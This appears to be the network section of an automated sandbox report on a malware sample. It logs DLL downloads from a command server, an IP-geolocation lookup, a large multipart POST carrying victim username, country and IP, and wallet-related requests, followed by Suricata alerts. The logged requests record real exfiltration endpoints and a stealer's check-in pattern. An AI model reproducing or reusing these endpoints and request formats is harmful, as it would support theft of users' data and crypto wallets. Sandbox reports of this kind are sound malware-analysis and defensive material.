Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
ipwho.is | 103.126.138.87 | |
tryno.ru | 172.67.175.222 | |
anaida.evisyn.lol | 172.67.149.91 |
GET
200
https://tryno.ru/robots
REQUEST
RESPONSE
BODY
GET /robots HTTP/1.1
Host: tryno.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:51 GMT
Content-Length: 36
Connection: keep-alive
Last-Modified: Wed, 01 Mar 2023 20:10:07 GMT
ETag: "24-5f5dc4c6745c0"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ms6cyIbqbSVbuBqGKHmkesiQ%2BlIQT0eGt68zC5z4%2BgKhxsLv7uTt4NFB0HgzEt6iOZ7FPGUZvS%2FmKWPVP%2F9qjZa0szA2nJsImHI4lfmmZ8uCWZTk71PunIu%2FyA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a60075c9dba19f4-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/Ionic.Zip.dll
REQUEST
RESPONSE
BODY
GET /dlls/Ionic.Zip.dll HTTP/1.1
Host: anaida.evisyn.lol
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:52 GMT
Content-Type: application/x-msdos-program
Content-Length: 462336
Connection: keep-alive
Last-Modified: Tue, 23 Oct 2018 08:31:00 GMT
ETag: "70e00-578e1307c9900"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FIdxhbdYpAH5o6341bY9k%2FKiadZWRCPeEtsuCN6P2ts89QU9F6dqavahXHgMkpjGrCf0dGu%2B%2FF94grz6yReLm9KRdb4FcQO2ULPYkJTGKQ5SkOWusJralFf7vIliHqiI3B5CFA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a600761cce98360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/EntityFramework.dll
REQUEST
RESPONSE
BODY
GET /dlls/EntityFramework.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:54 GMT
Content-Type: application/x-msdos-program
Content-Length: 4991352
Connection: keep-alive
Last-Modified: Thu, 16 Apr 2020 20:38:42 GMT
ETag: "4c2978-5a36e6b17b880"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kG8bauH8NDCtXPxMZOBZQ7%2FDUM8UHAYAw9l8FCkqhwLvhfQfCTmENN3pDrVzBqgIMtGNUn2S7uL58VVyJ2dH%2FSIiUaHTOeYGD9vosg7RzZ3WeUJDlQeOGs9QVNkVAKvwMVd%2BhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a60076f2d268360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/EntityFramework.SqlServer.dll
REQUEST
RESPONSE
BODY
GET /dlls/EntityFramework.SqlServer.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:55 GMT
Content-Type: application/x-msdos-program
Content-Length: 591752
Connection: keep-alive
Last-Modified: Thu, 16 Apr 2020 20:38:56 GMT
ETag: "90788-5a36e6bed5800"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r6bs5bGQL2rf8TQ1gVKE5lU8DWyLeDh%2BhPewfn97AsQsSCACSbMURUNGo7nrSdtwcW%2FZyFqKcikx0OGRYYSJIVv6v8zWQ2QXYBgYcSVSB1cu6J90dhX7bCieCN1yC3lofhzgcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a600777af1d8360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/System.Data.SQLite.dll
REQUEST
RESPONSE
BODY
GET /dlls/System.Data.SQLite.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:55 GMT
Content-Type: application/x-msdos-program
Content-Length: 393520
Connection: keep-alive
Last-Modified: Tue, 02 Nov 2021 17:44:02 GMT
ETag: "60130-5cfd1d6c67c80"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tL6su7DspxCKEQfZKybxFUxFOnrusQypu3XNTxUFuliYtGcft1Ac%2BAzE2hFK5qlT8GA4Oekk9jcg8u%2BJWj8rrF4Y60qsiD1Uby%2BFkGjl1BpW6ZD2NZa9XnTO43dmkIH7zKxvNg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a60077a0a228360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/System.Data.SQLite.EF6.dll
REQUEST
RESPONSE
BODY
GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 201528
Connection: keep-alive
Last-Modified: Tue, 02 Nov 2021 17:44:38 GMT
ETag: "31338-5cfd1d8ebcd80"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SWN%2BImhDRoF%2Frm%2BJK4LjQSrn3Gc9pnErxAMWmkJzOvNBw%2BkjTbB9Wn8O7oM4zhVJG%2F3sqY1Oe8cXfOmG9wRXLoFcMepVVTA03q4fyU3%2FjFxkOYo0ucnalez9Zy1iutuJz9qaeA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a60077c6d3d8360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/System.Data.SQLite.Linq.dll
REQUEST
RESPONSE
BODY
GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 201520
Connection: keep-alive
Last-Modified: Tue, 02 Nov 2021 17:45:14 GMT
ETag: "31330-5cfd1db111e80"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bztl7PzVLlU9%2FoVYaRhCco23TmJxO0SKma1smTG5k1lfMA0CJGMrVzmfyBdOuPXocsP4yXy0zSK529SpGHwyAJNt0SdboDNnNzz9Fj6uFfj0oaZQjDL7xOs3HoThCVp4GsIB1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a60077eafc48360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/x86/SQLite.Interop.dll
REQUEST
RESPONSE
BODY
GET /dlls/x86/SQLite.Interop.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 1374512
Connection: keep-alive
Last-Modified: Tue, 02 Nov 2021 17:47:02 GMT
ETag: "14f930-5cfd1e1811180"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VbBusqu7ZqMoTHxsMZ9NTKALfTZ5xH1EUwUOP1yA1smlKacFzuBmHaMPEEPZ7BXD%2F8D8u8C%2BOaC8PwWL8oyeQ%2Bv3zuac1AotL74E3BVvPY%2BtD6GzTCL6F4pl7mlAi%2BhSBMvD4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a600780dab78360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol/dlls/x64/SQLite.Interop.dll
REQUEST
RESPONSE
BODY
GET /dlls/x64/SQLite.Interop.dll HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:57 GMT
Content-Type: application/x-msdos-program
Content-Length: 1763632
Connection: keep-alive
Last-Modified: Tue, 02 Nov 2021 17:47:38 GMT
ETag: "1ae930-5cfd1e3a66280"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKcDIcd1YN83XcmQ%2FiKjn8alN4cj%2FyTPEPdEmgI7Ecl0FntIdjF0qoUxQhtVtaSrPdJ5NKXa9SWrnW27jk2La1DzFoJjXhXc6xndu%2FD6NvWVqnXht5yroAmPUpWnbeKFThHs3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a600783ef078360-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://ipwho.is/?output=xml
REQUEST
RESPONSE
BODY
GET /?output=xml HTTP/1.1
Host: ipwho.is
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:29:59 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
POST
100
https://anaida.evisyn.lol/c1n.php?ownerid=365&buildid=pisospro&countp=0&countc=0&username=test22&country=KR&ipaddr=175.208.134.152&BSSID=&countw=0
REQUEST
RESPONSE
BODY
POST /c1n.php?ownerid=365&buildid=pisospro&countp=0&countc=0&username=test22&country=KR&ipaddr=175.208.134.152&BSSID=&countw=0 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8db222ed1634fa6
Host: anaida.evisyn.lol
Content-Length: 1443859
Expect: 100-continue
HTTP/1.1 100 Continue
GET
200
https://ipwho.is/?output=xml
REQUEST
RESPONSE
BODY
GET /?output=xml HTTP/1.1
Host: ipwho.is
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:30:05 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
GET
200
https://anaida.evisyn.lol/online.php?country=XX&ipaddr=0.0.0.0&HWID=&processorid=&ownerid=365
REQUEST
RESPONSE
BODY
GET /online.php?country=XX&ipaddr=0.0.0.0&HWID=&processorid=&ownerid=365 HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:30:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V9P5mjWvG54GAz4kr9MIA41AfOkbbuyn902tRCbyfn5gcShhby5UMBpCDTnrqr4QeZBNatI65cbnp9iymA8tTZ7eQh%2FKfMVHkKURGM08f4b78bNnh1D7t1IXhHd9GvlnfNBEtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a6007c0ad5419ee-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://anaida.evisyn.lol//list.php?id=365
REQUEST
RESPONSE
BODY
GET //list.php?id=365 HTTP/1.1
Host: anaida.evisyn.lol
HTTP/1.1 200 OK
Date: Sat, 11 Mar 2023 01:30:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yJPRDI4gYGwfO8nWpz7sOe6FfPPSqDG86EYum24Z2%2B0GFgejDzmB8FSCChjf1vA3AwkEEaU0lvX5zOVZu8DUj4vzDyD4VkLzaqPYzdP0ptrUa1uDqTFbzfddRWUPrG4YHZ0AnA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7a6007c4ca4819ee-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET
0
https://anaida.evisyn.lol/getwallet.php?id=3651&wallet=nec
REQUEST
RESPONSE
BODY
GET /getwallet.php?id=3651&wallet=nec HTTP/1.1
Host: anaida.evisyn.lol
GET
0
https://anaida.evisyn.lol/getwallet.php?id=365&wallet=dash
REQUEST
RESPONSE
BODY
GET /getwallet.php?id=365&wallet=dash HTTP/1.1
Host: anaida.evisyn.lol
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49162 -> 104.21.83.128:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49164 -> 104.21.41.183:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49168 -> 103.126.138.87:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49174 -> 104.21.41.183:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
UDP 192.168.56.103:64894 -> 164.124.101.2:53 | 2037042 | ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is) | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49162 104.21.83.128:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.tryno.ru | c7:33:d0:e4:57:0d:af:57:35:25:fd:20:cc:47:c3:65:d6:37:2d:f9 |
TLSv1 192.168.56.103:49164 104.21.41.183:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.evisyn.lol | 0a:f6:16:98:f6:5d:6d:37:8d:82:fc:85:3b:7b:95:74:c4:59:7a:58 |
TLSv1 192.168.56.103:49168 103.126.138.87:443 |
C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA | CN=ipwho.is | 2a:17:81:88:c8:d8:c5:73:0c:58:4d:b4:18:93:91:a6:93:ed:e9:f0 |
TLSv1 192.168.56.103:49174 104.21.41.183:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.evisyn.lol | 0a:f6:16:98:f6:5d:6d:37:8d:82:fc:85:3b:7b:95:74:c4:59:7a:58 |
Snort Alerts
No Snort Alerts